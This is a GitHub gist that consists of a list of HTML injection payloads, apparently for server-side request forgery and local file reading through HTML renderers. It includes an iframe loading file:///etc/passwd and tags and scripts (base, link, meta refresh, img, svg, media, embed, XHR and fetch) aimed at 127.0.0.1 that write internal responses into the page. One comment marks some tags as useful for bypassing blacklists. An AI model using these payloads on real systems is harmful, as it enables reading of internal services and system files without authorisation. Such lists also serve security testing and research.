Skip to content

Instantly share code, notes, and snippets.

@ratnadip1998
Last active May 8, 2026 16:12
Show Gist options
  • Select an option

  • Save ratnadip1998/42b9775e14be4b3b2951f3e858a1ac09 to your computer and use it in GitHub Desktop.

Select an option

Save ratnadip1998/42b9775e14be4b3b2951f3e858a1ac09 to your computer and use it in GitHub Desktop.
<iframe src="file:///etc/passwd" height="1000px" width="1000px"></iframe>
<iframe src=\"https://example.com/\"></iframe>
<!-- Using base HTML tag -->
<base href="http://127.0.0.1" />
<!-- Loading external stylesheet/script -->
<link rel="stylesheet" src="http://127.0.0.1" />
<script src="http://127.0.0.1"></script>
<!-- Meta-tag to auto-refresh page -->
<meta http-equiv="refresh" content="0; url=http://127.0.0.1/" />
<!-- Loading external image -->
<img src="http://127.0.0.1" />
<!-- Loading external SVG -->
<svg src="http://127.0.0.1" />
<!-- Useful to bypass blacklists -->
<input type="image" src="http://127.0.0.1" />
<video src="http://127.0.0.1" />
<audio src="http://127.0.0.1" />
<audio><source src="http://127.0.0.1"/></audio>
<!-- Using XHR -->
<script>var x=new XMLHttpRequest();x.onload=(()=>document.write(this.responseText));x.open('GET','http://127.0.0.1');x.send();</script>
<!-- Using Fetch -->
<script>fetch('http://127.0.0.1').then(async r=>document.write(await r.text()))</script>
<!-- Using embed -->
<embed src="http://127.0.0.1" />
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment